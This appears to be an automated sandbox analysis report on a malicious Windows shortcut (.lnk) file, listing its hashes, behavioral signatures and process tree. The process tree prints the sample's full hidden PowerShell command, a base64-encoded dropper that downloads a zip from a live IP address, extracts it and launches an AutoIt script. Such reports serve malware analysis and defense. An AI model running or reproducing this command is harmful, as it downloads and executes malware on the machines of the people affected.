Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
22/08/2024, 11:22
Static task
static1
Behavioral task
behavioral1
Sample
3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66.lnk
Resource
win7-20240708-en
5 signatures
150 seconds
General
-
Target
3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66.lnk
-
Size
122KB
-
MD5
ffde299028d48cb2258d274f44d56766
-
SHA1
678fe2a8a01339138194a70763d69d18d2772beb
-
SHA256
3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66
-
SHA512
4273ec62e22493ca163095d7d97c3ad6464d4d3a30eafd906ad2e0a7a3bf10524424ebab394d9c2750a8a6407be6d6830ff250179455c0864db145bcee8899ef
-
SSDEEP
48:8SJXs8A2A8lBUpIuuwITyJjiYG+OV1sUAZCQkBK:8SJXb9A8bUxjFGpV1sRZJ
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://2.58.56.124/API481f.zip
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2304 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2304 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1344 wrote to memory of 2176 1344 cmd.exe 31 PID 1344 wrote to memory of 2176 1344 cmd.exe 31 PID 1344 wrote to memory of 2176 1344 cmd.exe 31 PID 2176 wrote to memory of 2304 2176 cmd.exe 32 PID 2176 wrote to memory of 2304 2176 cmd.exe 32 PID 2176 wrote to memory of 2304 2176 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGEgPSBbU3lzdGVtLkVudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJyk7ICR1cmwgPSAnaHR0cDovLzIuNTguNTYuMTI0L0FQSTQ4MWYuemlwJzsgJHppcFBhdGggPSAiJGFwcGRhdGFcQVBJNDgxZi56aXAiOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJHppcFBhdGg7IEFkZC1UeXBlIC1Bc3NlbWJseU5hbWUgU3lzdGVtLklPLkNvbXByZXNzaW9uLkZpbGVTeXN0ZW07IFtTeXN0ZW0uSU8uQ29tcHJlc3Npb24uWmlwRmlsZV06OkV4dHJhY3RUb0RpcmVjdG9yeSgkemlwUGF0aCwgJGFwcGRhdGEpOyAkYXV0b2l0UGF0aCA9ICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSI7ICRzY3JpcHRQYXRoID0gIiRhcHBkYXRhXHNjcmlwdC5hM3giOyBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkYXV0b2l0UGF0aCAtQXJndW1lbnRMaXN0ICRzY3JpcHRQYXRoOyBSZW1vdmUtSXRlbSAtUGF0aCAkemlwUGF0aA0K')) | Invoke-Expression"2⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGEgPSBbU3lzdGVtLkVudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJyk7ICR1cmwgPSAnaHR0cDovLzIuNTguNTYuMTI0L0FQSTQ4MWYuemlwJzsgJHppcFBhdGggPSAiJGFwcGRhdGFcQVBJNDgxZi56aXAiOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJHppcFBhdGg7IEFkZC1UeXBlIC1Bc3NlbWJseU5hbWUgU3lzdGVtLklPLkNvbXByZXNzaW9uLkZpbGVTeXN0ZW07IFtTeXN0ZW0uSU8uQ29tcHJlc3Npb24uWmlwRmlsZV06OkV4dHJhY3RUb0RpcmVjdG9yeSgkemlwUGF0aCwgJGFwcGRhdGEpOyAkYXV0b2l0UGF0aCA9ICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSI7ICRzY3JpcHRQYXRoID0gIiRhcHBkYXRhXHNjcmlwdC5hM3giOyBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkYXV0b2l0UGF0aCAtQXJndW1lbnRMaXN0ICRzY3JpcHRQYXRoOyBSZW1vdmUtSXRlbSAtUGF0aCAkemlwUGF0aA0K')) | Invoke-Expression"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-